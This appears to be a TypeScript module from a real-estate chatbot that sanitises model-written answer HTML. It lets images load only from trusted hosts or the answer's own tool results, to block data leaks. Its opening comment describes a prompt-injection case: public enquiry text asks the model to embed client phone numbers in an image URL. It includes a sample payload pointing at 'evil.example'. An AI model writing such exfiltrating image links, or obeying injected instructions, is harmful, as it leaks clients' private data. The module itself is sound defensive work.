// What rendered answer HTML may make the browser fetch by itself. An image loads with no click, so an image URL the
// model wrote is a way out for whatever the URL carries: an enquiry's text, typed by the public, could ask for the
// agent's client phone numbers in one ("![x](https://evil.example/?d=…)"). Only our own media hosts load; any other
// image is shown as its text with a link, which needs the user's click.

// Measured on saved answers (2026-10-16): 504 images from the public bucket, 4 from the MCP bucket, 2 from
// insidersofdubai.com, 1 from Dropbox (that one quoted from its tool result, so trusted as one below). The other
// hosts are the app's own media (pickLandscapeHero's), only one bucket of Google's.
const TRUSTED_IMAGE_PREFIXES = [
  'https://storage.googleapis.com/thrivestate-prod-aibot-public/',
  'https://insiders-mcp-prod.s3.eu-central-1.amazonaws.com/',
  'https://insidersofdubai.com/',
  'https://cdn.insidersofdubai.com/',
  'https://cdn1.insidersofdubai.com/',
  'https://listings.thrivestate.io/',
  'https://cdn-img.thrivestate.dev/',
] as const;

const HTTPS_URL_RE = /^https:\/\/\S+$/;
const MAX_TOOL_URLS = 2000;

/**
 * Every https URL in an answer's tool results, as written. An image at exactly one of them is the data's own (a
 * developer's hero image, a listing photo): the model cannot add anything to it, so it loads like ours does.
 */
export const toolResultUrls = (parts: readonly unknown[] | null | undefined): ReadonlySet<string> => {
  const urls = new Set<string>();
  const visit = (value: unknown, depth: number): void => {
    if (urls.size >= MAX_TOOL_URLS || depth > 12) return;
    if (typeof value === 'string') {
      if (HTTPS_URL_RE.test(value)) urls.add(value);
    } else if (Array.isArray(value)) {
      for (const item of value) visit(item, depth + 1);
    } else if (value && typeof value === 'object') {
      for (const item of Object.values(value)) visit(item, depth + 1);
    }
  };
  for (const part of parts ?? []) {
    const { type, output } = (part ?? {}) as { type?: unknown; output?: unknown };
    if (typeof type === 'string' && (type.startsWith('tool-') || type === 'dynamic-tool')) visit(output, 0);
  }
  return urls;
};

// The tool URLs of the answer being rendered: rendering is synchronous, so set for its duration only.
let renderingToolUrls: ReadonlySet<string> = new Set();

/** Renders with the answer's own tool URLs trusted as images (toolResultUrls), and none after. */
export const withToolImageUrls = <T>(urls: ReadonlySet<string>, render: () => T): T => {
  renderingToolUrls = urls;
  try {
    return render();
  } finally {
    renderingToolUrls = new Set();
  }
};

/**
 * An https URL on one of our media hosts, by its exact origin and path prefix (no look-alike host passes), or
 * exactly a URL of the answer's own tool results while it renders (withToolImageUrls).
 */
export const isTrustedImageUrl = (url: string | null | undefined): boolean => {
  if (!url) return false;
  if (renderingToolUrls.has(url) && HTTPS_URL_RE.test(url)) return true;
  let parsed: URL;
  try {
    parsed = new URL(url);
  } catch {
    return false;
  }
  if (parsed.protocol !== 'https:' || parsed.username || parsed.password) return false;
  const normalised = `${parsed.origin}${parsed.pathname}`;
  return TRUSTED_IMAGE_PREFIXES.some((prefix) => normalised.startsWith(prefix));
};

// Everything else in answer HTML that fetches with no click: responsive sources, inline CSS (url()), legacy
// background attributes, and media elements. None is needed for an answer; all are removed. An <input> is kept
// only as a task list's checkbox (installTrustedMediaHook): `type="image"` would load its src.
export const UNTRUSTED_MEDIA_SANITIZE = {
  FORBID_TAGS: ['video', 'audio', 'source', 'picture', 'track'],
  FORBID_ATTR: ['style', 'srcset', 'background', 'poster'],
} as const;

type PurifyLike = {
  addHook: (entry: 'afterSanitizeAttributes', hook: (node: Element) => void) => void;
};

/** A markdown task list's box ("- [x] Booked"), disabled as marked writes it; no other input is drawn. */
const isTaskCheckbox = (node: Element): boolean =>
  node.getAttribute('type')?.toLowerCase() === 'checkbox' && node.hasAttribute('disabled');

const installed = new WeakSet<object>();

/**
 * Removes every <img> whose source is not ours, after sanitising, leaving its alt text, and every <input> but a
 * task list's checkbox. Covers raw HTML the model writes as well as markdown images. Install it on the answer
 * renderer's own DOMPurify instance: on the shared default it would also filter every other page's HTML.
 */
export const installTrustedMediaHook = (purify: PurifyLike): void => {
  if (installed.has(purify)) return;
  installed.add(purify);
  purify.addHook('afterSanitizeAttributes', (node) => {
    if (node.tagName === 'INPUT') {
      if (isTaskCheckbox(node)) node.removeAttribute('src');
      else node.remove();
      return;
    }
    if (node.tagName !== 'IMG' || isTrustedImageUrl(node.getAttribute('src'))) return;
    node.replaceWith(node.ownerDocument.createTextNode(node.getAttribute('alt') ?? ''));
  });
};

let answerPurifierInstance: PurifyLike | null = null;

/**
 * The one DOMPurify instance answers render with, its media hook installed: never the shared default, whose
 * other callers (property and developer descriptions, shared answers) keep their own rules.
 */
export const answerPurifier = <P extends PurifyLike>(create: () => P): P => {
  if (!answerPurifierInstance) {
    const purifier = create();
    installTrustedMediaHook(purifier);
    answerPurifierInstance = purifier;
  }
  return answerPurifierInstance as P;
};
